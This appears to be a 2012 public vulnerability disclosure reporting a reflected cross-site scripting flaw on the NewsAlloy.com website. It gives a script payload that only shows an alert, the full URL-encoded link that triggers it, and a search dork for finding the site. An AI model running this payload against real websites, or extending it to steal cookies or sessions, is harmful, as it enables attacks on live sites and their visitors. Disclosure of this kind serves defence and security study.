NewsAlloy.com suffers from a cross site scripting vulnerability.
84f9e1f3978d97206d6ce07cb4aa35b639e442c610071272d6913277762c1632
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
WhiteHatZone
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# Exploit Title: XSS vulnerability in NewsAlloy.com
# Date: 10/01/2012
# Author: Girish Shrimali
# Website: http://whitehatzone.blogspot.com
# Tested On: Win7
# Email: gjshrimali@gmail.com
# Google Dork : newsalloy
##############################################################################################################
>>> Vulnerable : http://www.newsalloy.com/
>>> Script : <script>alert(String.fromCharCode(88, 83, 83, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 71, 105, 114, 105, 115, 104, 32, 83, 104, 114, 105, 109, 97, 108, 105))</script>
>>> Vulnerable link : http://www.newsalloy.com/topic/%3Cscript%3Ealert%28String.fromCharCode%2888%2C_83%2C_83%2C_32%2C_102%2C_111%2C_117%2C_110%2C_100%2C_32%2C_98%2C_121%2C_32%2C_71%2C_105%2C_114%2C_105%2C_115%2C_104%2C_32%2C_83%2C_104%2C_114%2C_105%2C_109%2C_97%2C_108%2C_105%29%29%3C%2Fscript%3E/
##############################################################################################################
Greetz : Vidit Baxi, Sumit Pareek